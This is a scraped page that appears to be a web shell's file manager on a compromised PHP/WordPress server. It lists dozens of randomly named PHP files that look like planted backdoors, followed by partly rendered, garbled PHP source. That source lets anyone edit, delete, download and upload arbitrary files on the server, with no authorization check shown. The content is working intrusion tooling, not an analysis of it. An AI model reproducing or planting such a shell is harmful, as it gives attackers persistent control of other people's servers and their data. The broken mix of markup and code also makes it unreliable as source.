File Manager
Files in the directory:
aayqo.php
boom8.php
breei.php
cgG8O9gHZs.php
css_4h7jGgFo.php
css_BIj2mF5p.php
css_LWSNYhai.php
css_WGAaobxM.php
doc.jpg
doc.php
doc.phtml
error_LlLlg1VV.php
error_otqqflrF.php
fazemrx1949_b9Kl0iiI.php
hEclqHD78S.php
kwago.php
ltrzq.php
nxapo.php
paOkmc2UEH.php
ppp.php
prom.php
pros.php
pu9.php
rcc9.php
test-page-template.php
test-page-template.php.php.tar.gz
test-page-template.php.tar
utchiha_IwhNTayK.php
utchiha_Q0kKfVq1.php
utchiha_Yq7hkNuo.php
utchiha_hLuTws1k.php
utchiha_iA2cPSxn.php
utchiha_v2bmBzI2.php
utchiha_wpGiVpwq.php
vfirx.php
wp_qKZ8oZkg.php
wp_urUeQ0YD.php
xl9.php
Upload a File
Upload
Edit File: fazemrx1949_b9Kl0iiI.php
File '$filename' has been updated.
"; } break; case 'delete': if (file_exists($path)) { unlink($path); echo "
File '$filename' has been deleted.
"; } break; case 'download': if (file_exists($path)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $filename . '"'); readfile($path); exit; } break; case 'upload': if (isset($_FILES['file']) && $_FILES['file']['error'] == UPLOAD_ERR_OK) { $uploadedFile = $_FILES['file']; $uploadedFilename = $uploadedFile['name']; $uploadedFilePath = $directory . $uploadedFilename; if (move_uploaded_file($uploadedFile['tmp_name'], $uploadedFilePath)) { echo "
File '$uploadedFilename' has been uploaded.
"; } else { echo "
Error uploading file '$uploadedFilename'.
"; } } break; } } } // Get the list of files in the directory $files = scandir($directory); ?>
Login
File Manager
Files in the directory:
" . $file . ""; } } ?>
Upload a File
Upload
Edit File:
Save
Download
Delete
Save
Download
Delete